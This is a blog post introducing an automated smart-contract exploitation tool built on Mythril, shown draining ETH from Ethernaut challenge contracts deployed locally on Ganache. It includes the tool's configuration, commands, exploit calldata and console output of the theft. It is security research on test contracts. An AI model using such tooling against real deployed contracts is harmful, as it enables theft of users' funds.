In my previous article I showed that Mythril can discover non-trivial vulnerabilities in Ethereum smart contracts and compute the transaction(s) needed to exploit them. The obvious next step: Why not build an all-in-one tool that automates the whole process? Enter Scrooge McEtherface, a proof-of-concept I hacked together over the past few days. Scrooge uses Mythril’s Ether Thief and Suicide modules to automatically extract ETH from vulnerable smart contracts.

Scrooge turned out to be pretty easy to write — it’s less than 200 lines of code and as you can see on the screenshot, 95% of the engineering effort went into improving the graphics. I also tested it on a couple of Ethernaut challenges. Here’s the rundown.

Fallout

The first challenge contains the classical misnamed constructor flaw: Anyone can become the owner by calling Fal1Out() . We know that Mythril detects this with default settings so it should be an easy win.

Scrooge has a configuration file that contains a few basic options. Unless you have a fully synced Ropsten node, the easiest way to reproduce this is firing up Ganache and deploying the contract locally using Remix.

In my own experiment I edited the settings in Scrooge’s config.ini to point to Ganache RPC and use a pre-generated Ganache test account (different from the contract creator) to send transactions from.

[settings]

rpc = https://localhost:8545

sender = 0x56c3a80CCC712Dbf38177fdfEbD8436F8833c4A9

symbolic_tx_count = 2

Scrooge is now locked-and-loaded. In fact, it’s so script-kiddy friendly that it doesn’t accept any command line arguments besides the target address. Here is the output from running Scrooge against the Fallout contract:

$ ./scrooge 0x27d390aa4a929012b58ed6662f2dcf8e6a7f8291

Scrooge McEtherface at your service.

Exploring 0x27d390aA4a929012b58Ed6662F2dcf8E6a7F8291 over 2 symbolic transactions. Your initial account balance is 100.00000 ETH.

Charging lasers...

Looks like anyone can withdraw ETH from this contract. You are about to send the following transaction: From: 0x56c3a80CCC712Dbf38177fdfEbD8436F8833c4A9, To: 0x27d390aA4a929012b58Ed6662F2dcf8E6a7F8291, Value: 0

Data: 0x6fab5ddf

Are you sure you want to proceed (y/N)? Transaction sent successfully, tx-hash: 0x619d4b4ba80a9cddabab0044dee857ae7e60b53c97bc9fb674227f579dd17cc2. Waiting for transaction to be mined... You are about to send the following transaction:

From: 0x56c3a80CCC712Dbf38177fdfEbD8436F8833c4A9, To: 0x27d390aA4a929012b58Ed6662F2dcf8E6a7F8291, Value: 0

Data: 0x8aa96f38

Are you sure you want to proceed (y/N)? Transaction sent successfully, tx-hash: 0x59dd01aae6b8c150f4593fdfbf23c62d80605ccd3a3d7f61500ac0018bbdee61. Waiting for transaction to be mined... Snagged 4.99988 ETH. Your final account balance is 104.99988 ETH.

Looks like it worked! We lost a few Wei to transaction fees but the rest ended up in the our account.

Fallback

In Fallback, the goal is to send a specific sequence of transactions to become the contract owner. The challenge is easy for a human attacker, but not that trivial to solve for an automated analyzer.

First of all, it requires three transactions to be sent in the correct order. As i wrote in my previous article, Mythril can explore program states over an arbitrary number of transactions, but the cost of analysis increases exponentially with the number of transactions.

A successful attack also requires sending small amounts of ETH with the initial two the transactions. Those amounts need to be adjusted such that the attack is profitable. Optimally, they’d also be optimized to maximize profits.

Scrooge doesn’t do any of those optimizations (don’t complain, it was a weekend project and PRs are of course welcome). You can however increase the amount of transactions it explores in config.ini . For Fallback this variable needs to be set to 3:

symbolic_tx_count = 3

Now we should be ready to pwn a locally deployed Fallback instance with a balance of 5 ETH:

$ ./scrooge 0xffee64cf24b12d9b4de460a3ef6d39fedd431d88 Scrooge McEtherface at your service.

Exploring 0xffEE64Cf24b12D9B4De460a3eF6D39FEdd431d88 over 3 symbolic transactions.

Your initial account balance is 109.99975 ETH.

Charging lasers...

Looks like anyone can withdraw ETH from this contract.



You are about to send the following transaction:

WARNING: You'll be transferring 0.00056 ETH wth this transaction

From: 0x56c3a80CCC712Dbf38177fdfEbD8436F8833c4A9, To: 0xffEE64Cf24b12D9B4De460a3eF6D39FEdd431d88, Value: 562949953421312

Data: 0xd7bb99ba Are you sure you want to proceed (y/N)? Transaction sent successfully, tx-hash: 0x0961f1ada3bcd0b3ed1065466a9d6d08d3cbe11bb3de6a3f88e15efa2fb1f3e3. Waiting for transaction to be mined... You are about to send the following transaction:

WARNING: You'll be transferring 0.00000 ETH wth this transaction

From: 0x56c3a80CCC712Dbf38177fdfEbD8436F8833c4A9, To: 0xffEE64Cf24b12D9B4De460a3eF6D39FEdd431d88, Value: 549755813888

Data: 0x Are you sure you want to proceed (y/N)? Transaction sent successfully, tx-hash: 0xe715eca2abef303910e950860ea00f0c0b3bd54d40cf1273f1f8eba51aae05c0. Waiting for transaction to be mined... You are about to send the following transaction:

From: 0x56c3a80CCC712Dbf38177fdfEbD8436F8833c4A9, To: 0xffEE64Cf24b12D9B4De460a3eF6D39FEdd431d88, Value: 0

Data: 0x3ccfd60b Are you sure you want to proceed (y/N)? Transaction sent successfully, tx-hash: 0x366ffbf28dbe258bbf102595de70107c03fc35d69387f6ba2ce71fe866cf3320. Waiting for transaction to be mined... Snagged 4.99980 ETH. Your final account balance is 114.99956 ETH.

Looking good! Note that in this case, Scrooge created three transactions and sent small amounts of Wei along with the first two (it could probably have sent just 1 Wei but we’ll take the loss).

Wow, isn’t This a Very Dangerous Tool?

In March 2018, researchers claimed to have found 34,000 exploitable contracts on the Ethereum mainnet. This claims were widely overblown. It would be naive to believe that Scrooge-like tools (some of them private) aren’t run by bad actors at all times. In fact, finding medium-complexity bugs in older accounts that haven’t been exploited yet is highly unlikely (my guess is that the MAIAN results contained 33,998 false positives, but I’m happy to have a look at the data should it be released).

Here are some numbers that are based on my own observations and match the experience of several other researchers working in the field. On average, there’s one or two exploitable contracts deployed on the mainnet per week, but most of them never hold any ETH. If an opportunity opens up, attackers are racing to exploit it (the time window does seems to be open for several hours, so apparently the hackers' toolsets could still benefit from some optimization).

Then of course, honeypots can be tailored to specific tools and script kiddies running tools like Scrooge are easy targets. I built in a few checks and warnings, but then again, if you trip into a honeypot you deserve to loose your ETH.

TL;DR

Scrooge McEtherface fully automates attacks on vulnerable smart contracts and extracts the ETH to the attacker’s account. It is based on Mythril Classic and can therefore compute complex attacks that require multiple transactions to be sent with specific inputs. Use it responsibly and hop on our Discord Server for discussion.

About Mythril and MythX

Mythril is a free and open-source smart contract security analyzer. It uses symbolic execution to detect a variety of security vulnerabilities.

MythX is a cloud-based smart contract security service that seamlessly integrates into smart contract development environments and build pipelines. It bundles multiple bleeding-edge security analysis processes into an easy-to-use API that allows anyone to create purpose-built smart contract security tools. MythX is compatible with Ethereum, Tron, Vechain, Quorum, Roostock and other EVM-based platforms.